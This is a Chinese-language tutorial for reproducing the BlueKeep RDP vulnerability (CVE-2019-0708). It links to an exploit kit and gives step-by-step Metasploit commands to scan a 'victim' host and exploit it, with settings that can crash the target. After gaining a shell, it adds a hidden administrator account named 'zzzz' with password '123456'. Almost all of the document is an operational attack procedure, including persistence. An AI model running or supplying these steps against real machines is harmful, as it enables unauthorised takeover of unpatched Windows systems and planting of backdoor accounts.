Microsoft Windows 远程桌面服务远程执行代码漏洞(CVE-2019-0708)漏洞复现
详细描述
当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。
漏洞影响版本
Windows 7
Windows server 2008 R2
Windows server 2008
Windows 2003
Windows xp
环境
攻击机:Kali-Linux-2020.1
#免安装版本
链接:https://pan.baidu.com/s/1oITUiekxB78u6tvRQ8ELXw 提取码:xayr
漏洞验证
1、更新msf
apt-get update
apt-get install metasploit-framework
2、下载攻击套件
github:https://github.com/TinToSer/bluekeep-exploit
百度云盘:https://pan.baidu.com/s/1CR04VKTegL2Qzn-6Y8av8A 提取码:2506
3、替换msf中相应的文件
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
4、启动msf
msfconsole
5、使用reload_all加载文件
reload_all
6、搜索0708,可以看到文件成功加载
search 2019_0708
7、使用扫描模块(scanner)
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set rhost 10.xx.xx.xx //这里的ip填写受害机地址
run
如发现上图红色箭头指向:The target is vulnerable,证明目标主机存在0708漏洞,可以利用
8、漏洞利用
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhost 10.xx.xx.xx //这里的ip填写受害机地址
set rport 3389 //受害机远程端口
set target 1 //可以先从1开始;选择3,受害机可能会蓝屏(谨慎!)
show options
run
9、漏洞利用成功,操控受害机
getuid //获取目前进程的用户识别码
shell
#添加一个zzzz用户,密码为123456
net user zzzz 123456 /add //net user 用户名 密码 /add
net localgroup administrators zzzz /add //把zzzz用户加入管理员组去